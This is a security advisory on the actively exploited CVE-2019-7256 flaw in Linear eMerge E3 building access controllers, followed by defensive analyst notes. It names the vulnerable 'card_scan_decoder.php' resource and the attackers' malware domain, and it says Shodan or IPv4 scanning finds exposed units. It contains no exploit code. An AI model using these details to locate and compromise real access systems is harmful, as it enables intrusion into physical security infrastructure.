The Linear eMerge E3 building access system, created by Linear Solutions, has an unpatched vulnerability that was first announced in May 2019, identified as CVE-2019-7256. In November 2019, code that provided a proof-of-concept exploit was released publicly. Now, researchers from Sonic Wall have warned that attackers are actively discovering vulnerable building access systems that are accessible directly over the Internet and exploiting them by sending a simple HTTP request to the systems. Attackers have already compromised over 2,300 of these systems and used them to launch distributed denial of service (DDoS) attacks. The vulnerability allows attackers to command the building access system to download any file, execute it, and run shell commands of the attackers’ choosing. Attackers have been using this vulnerability to target the “card_scan_decoder.php” resource in the web-based interface of eMerge E3 systems to download malware from the domain “switchnets.net” and immediately execute the malware. It is possible to use services such as Shodan to discover vulnerable eMerge E3 systems that are directly addressable on the Internet, and it is also practical for attackers to scan the entire range of IPv4 addresses to find vulnerable systems.
Analyst Notes
Any organization that has an eMerge E3 building access system should check that it is not connected directly to the Internet. If it is, it is reasonable to assume that it has been attacked, and it should be investigated for signs of exploitation. Building access systems and any other critical systems with a web-based user interface should not be directly accessible by an IP address on the public Internet. Instead, employees who require remote access to critical systems should first use a virtual private network (VPN) to securely authenticate to the corporate network, and then work with critical systems. That provides a crucial additional layer of security to keep attackers from exploiting vulnerabilities in systems. It is also important to monitor logs that show attempted accesses to servers so that attack attempts can be recognized quickly and mitigated.
For more information, please see:
https://securityaffairs.co/wordpress/97226/hacking/nsc-linear-emerge-e3-hack.html
https://securitynews.sonicwall.com/xmlpost/linear-emerge-e3-access-controller-actively-being-exploited/
